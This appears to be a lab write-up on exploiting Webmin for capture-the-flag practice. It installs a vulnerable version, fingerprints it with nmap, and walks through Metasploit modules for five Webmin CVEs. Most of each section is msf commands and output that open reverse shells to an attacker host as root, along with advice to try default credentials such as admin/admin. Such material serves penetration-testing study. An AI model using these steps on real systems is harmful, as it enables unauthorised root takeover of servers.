Webmin is a web-based system administration interface for UNIX systems, enabling server management through a browser instead of the command line. It allows you to easily configure a variety of system settings such as user accounts, disk quotas, and services.
The software has had a number of vulnerabilities over the years, and is often featured in Capture The Flag (CTF) exercises.
To install Webmin, just download a release tar ball and run setup.sh.
root@ubuntu:/root/webmin-1.890# wget https://github.com/webmin/webmin/releases/download/1.890/webmin-1.890.tar.gz
root@ubuntu:/root/webmin-1.890# tar zxvf webmin-1.890.tar.gz
root@ubuntu:/root/webmin-1.890# sudo sh setup.sh
***********************************************************************
* Welcome to the Webmin setup script, version 1.890 *
***********************************************************************
Webmin is a web-based interface that allows Unix-like operating
systems and common Unix services to be easily administered.
Installing Webmin in /root/webmin-1.890 ...
***********************************************************************
Webmin uses separate directories for configuration files and log files.
Unless you want to run multiple versions of Webmin at the same time
you can just accept the defaults.
Config file directory [/etc/webmin]:
Log file directory [/var/webmin]:
***********************************************************************
Webmin is written entirely in Perl. Please enter the full path to the
Perl 5 interpreter on your system.
Full path to perl (default /usr/bin/perl):
Testing Perl ...
Perl seems to be installed ok
***********************************************************************
Operating system name: Ubuntu Linux
Operating system version: 18.04
***********************************************************************
Webmin uses its own password protected web server to provide access
to the administration programs. The setup script needs to know :
- What port to run the web server on. There must not be another
web server already using this port.
- The login name required to access the web server.
- The password required to access the web server.
- If the webserver should use SSL (if your system supports it).
- Whether to start webmin at boot time.
Web server port (default 10000):
Login name (default admin):
Login password:
Password again:
The Perl SSLeay library is not installed. SSL not available.
Webmin does not support being started at boot time on your system.
***********************************************************************
Creating web server config files..
..done
Creating access control file..
..done
Inserting path to perl into scripts..
..done
Creating start and stop scripts..
..done
Copying config files..
..done
Creating uninstall script /etc/webmin/uninstall.sh ..
..done
Changing ownership and permissions ..
..done
Running postinstall scripts ..
..done
Enabling background status collection ..
..done
Attempting to start Webmin mini web server..
Starting Webmin server in /root/webmin-1.890
..done
***********************************************************************
Webmin has been installed and started successfully. Use your web
browser to go to
http://ubuntu:10000/
and login with the name and password you entered previously.
With Webmin installed, you should be able to login to it by connecting to http://127.0.0.1:10000 with a web browser.
Identifying Webmin Installs
By default, Webmin runs on port 10000. It can easily be identified using NMap.
nmap -p 10000 192.168.1.95 -sV -Pn -n
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-24 14:57 GMT
Nmap scan report for 192.168.1.95
Host is up (0.00030s latency).
PORT STATE SERVICE VERSION
10000/tcp open http MiniServ 1.890 (Webmin httpd)
MAC Address: 08:00:27:3C:8D:A4 (Oracle VirtualBox virtual NIC)
Exploiting Webmin
Looking in Metasploit, we can see there are 5 exploits released for Webmin in the past 10 years.
msf6 > grep -v DoS grep -v local search type:exploit name:webmin
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/webmin_show_cgi_exec 2012-09-06 excellent Yes Webmin /file/show.cgi Remote Command Execution
1 exploit/linux/http/webmin_file_manager_rce 2022-02-26 excellent Yes Webmin File Manager RCE
2 exploit/linux/http/webmin_package_updates_rce 2022-07-26 excellent Yes Webmin Package Updates RCE
3 \_ target: Unix In-Memory . . . .
4 \_ target: Linux Dropper (x86 & x64) . . . .
5 \_ target: Linux Dropper (ARM64) . . . .
6 exploit/linux/http/webmin_packageup_rce 2019-05-16 excellent Yes Webmin Package Updates Remote Command Execution
7 exploit/unix/webapp/webmin_upload_exec 2019-01-17 excellent Yes Webmin Upload Authenticated RCE
8 exploit/linux/http/webmin_backdoor 2019-08-10 excellent Yes Webmin password_change.cgi Backdoor
9 \_ target: Automatic (Unix In-Memory) . . . .
10 \_ target: Automatic (Linux Dropper) . . . .
Aside from the Webmin backdoor from 2019, all of these exploits require credentials to login. Attempting defaults such as webmin, root or admin (with both the username and password set to the same value) should be a good start.
CVE-2019-15107: Webmin Backdoor
Webmin versions 1.890 through to 1.921 downloads included a backdoor. The password change functionality was modified so user input was passed to the Perl qx function that will execute commands of the attackers choosing.
msf6 > use exploit/linux/http/webmin_backdoor
[*] Using configured payload cmd/unix/reverse_perl
msf6 exploit(linux/http/webmin_backdoor) > set RHOSTS 192.168.1.195
RHOSTS => 192.168.1.195
msf6 exploit(linux/http/webmin_backdoor) > set LHOST eth0
LHOST => eth0
msf6 exploit(linux/http/webmin_backdoor) > run
[*] Started reverse TCP handler on 192.168.1.192:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (192.168.1.192:4444 -> 192.168.1.95:46726) at 2025-01-24 14:52:49 +0000
id
uid=0(root) gid=0(root) groups=0(root)
CVE-2019-9624: Authenticated Upload RCE
This exploit requires valid credentials. Remote code execution is possible in versions 1.900 and below. Using the Java File manager it’s possible to upload malicious .cgi files that will be executed on the server.
msf6 > use unix/webapp/webmin_upload_exec
msf6 exploit(unix/webapp/webmin_upload_exec) > set USERNAME admin
USERNAME => admin
msf6 exploit(unix/webapp/webmin_upload_exec) > set PASSWORD admin
PASSWORD => admin
msf6 exploit(unix/webapp/webmin_upload_exec) > set RHOSTS 192.168.1.95
RHOSTS => 192.168.1.95
msf6 exploit(unix/webapp/webmin_upload_exec) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf6 exploit(unix/webapp/webmin_upload_exec) > set LHOST 192.168.1.192
LHOST => 192.168.1.192
msf6 exploit(unix/webapp/webmin_upload_exec) > set SSL false
[!] Changing the SSL option's value may require changing RPORT!
SSL => false
msf6 exploit(unix/webapp/webmin_upload_exec) > run
[*] Started reverse TCP handler on 192.168.1.192:4444
[+] Session cookie: f0fe252e5ed72ad31db23c2a7d6828f7
[*] Target URL => http://192.168.1.95:10000
[*] Searching for directory to upload...
[+] File qayyz.cgi was successfully uploaded.
[*] Attempting to execute the payload...
[+] Deleted qayyz.cgi
[*] Command shell session 1 opened (192.168.1.192:4444 -> 192.168.1.95:40964) at 2025-01-26 11:54:20 +0000
id
uid=0(root) gid=0(root) groups=0(root)
CVE-2019-12840: Package Update Code Execution
Version 1.910 and below are susceptible to an RCE through the package update module. This requires valid credentials to run.
msf6 exploit(unix/webapp/webmin_upload_exec) > use exploit/linux/http/webmin_packageup_rce
[*] Using configured payload cmd/unix/reverse_perl
msf6 exploit(linux/http/webmin_packageup_rce) > set RHOSTS 192.168.1.95
RHOSTS => 192.168.1.95
msf6 exploit(linux/http/webmin_packageup_rce) > set USERNAME admin
USERNAME => admin
msf6 exploit(linux/http/webmin_packageup_rce) > set PASSWORD admin
PASSWORD => admin
msf6 exploit(linux/http/webmin_packageup_rce) > set LHOST 192.168.1.192
LHOST => 192.168.1.192
msf6 exploit(linux/http/webmin_packageup_rce) > run
[*] Started reverse TCP handler on 192.168.1.192:4444
[+] Session cookie: 23ad4287fb4850a6c9ac12b9c5d1d3e1
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (192.168.1.192:4444 -> 192.168.1.95:46742) at 2025-01-25 15:34:27 +0000
id
uid=0(root) gid=0(root) groups=0(root)
The next two exploits didn’t work out the box with Webmin version 1.890. They do both work with 1.984. This version can be downloaded using the following wget command.
wget https://github.com/webmin/webmin/releases/download/1.984/webmin-1.984.tar.gz
CVE-2022-36446: Package Update Command Injection
This vulnerability targets versions prior to 1.997, and requires valid credentials. Webmin uses package manager commands such as apt and yum to apply operating system updates. Due to lack of bounds checking, it’s possible to inject additional command and achieve remote code execution.
msf6 > use linux/http/webmin_package_updates_rce
[*] Using configured payload cmd/unix/reverse_perl
msf6 exploit(linux/http/webmin_package_updates_rce) > set RHOSTS 192.168.1.95
RHOSTS => 192.168.1.95
msf6 exploit(linux/http/webmin_package_updates_rce) > set USERNAME admin
USERNAME => admin
msf6 exploit(linux/http/webmin_package_updates_rce) > set PASSWORD admin
PASSWORD => admin
msf6 exploit(linux/http/webmin_package_updates_rce) > set LHOST 192.168.1.192
LHOST => 192.168.1.192
msf6 exploit(linux/http/webmin_package_updates_rce) > set SSL false
[!] Changing the SSL option's value may require changing RPORT!
SSL => false
msf6 exploit(linux/http/webmin_package_updates_rce) > run
[*] Started reverse TCP handler on 192.168.1.192:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[+] The target appears to be vulnerable.
[*] Attempting login
[+] Logged in!
[*] Sending payload
[*] Command shell session 2 opened (192.168.1.192:4444 -> 192.168.1.95:59132) at 2025-01-24 16:07:21 +0000
id
uid=0(root) gid=0(root) groups=0(root)
CVE-2022-0824: File Manager RCE
This vulnerability targets versions before 1.990. The exploit expects Webmin to be installed in /usr/share/webmin.
msf6 > use linux/http/webmin_file_manager_rce
[*] Using configured payload cmd/unix/reverse_perl
msf6 exploit(linux/http/webmin_file_manager_rce) > set RHOSTS 192.168.1.95
RHOSTS => 192.168.1.95
msf6 exploit(linux/http/webmin_file_manager_rce) > set LHOST eth0
LHOST => eth0
msf6 exploit(linux/http/webmin_file_manager_rce) > set username admin
username => admin
msf6 exploit(linux/http/webmin_file_manager_rce) > set password admin
password => admin
msf6 exploit(linux/http/webmin_file_manager_rce) > run
[*] Started reverse TCP handler on 192.168.1.192:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Using URL: http://192.168.1.192:8080/UZyRFJx
[*] Attempting to authenticate with Webmin
[+] Authentication successful
[*] Downloading remote url
[*] Fetching payload from HTTP server
[*] 192.168.1.95 webmin_file_manager_rce - Request 'GET /UZyRFJx.cgi'
[*] 192.168.1.95 webmin_file_manager_rce - Sending payload ...
[*] Finished downloading remote url
[*] Modifying the permissions of the uploaded payload to 0755
[!] This exploit may require manual cleanup of '/usr/share/webmin/UZyRFJx.cgi' on the target
[*] Server stopped.
[+] Deleted /usr/share/webmin/UZyRFJx.cgi
[*] Command shell session 1 opened (192.168.1.192:4444 -> 192.168.1.95:54972) at 2025-01-26 12:51:55 +0000
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 192.168.1.192:4444 -> 192.168.1.95:54972 (192.168.1.95)
msf6 exploit(linux/http/webmin_file_manager_rce) > sessions -i 1
[*] Starting interaction with 1...
id
uid=0(root) gid=0(root) groups=0(root)
In Conclusion
Webmin exploitation is still common on Capture the Flag exercises for a couple of reasons. The software is open source, so it’s easy to get a copy of the vulnerable versions, and the exploits are reliable (they don’t rely on memory corruption), and shouldn’t crash the service.
Whilst this article covers the exploits available in Metasploit, a newer privilege escalation vulnerability was discovered in 2024 (CVE-2024-12828).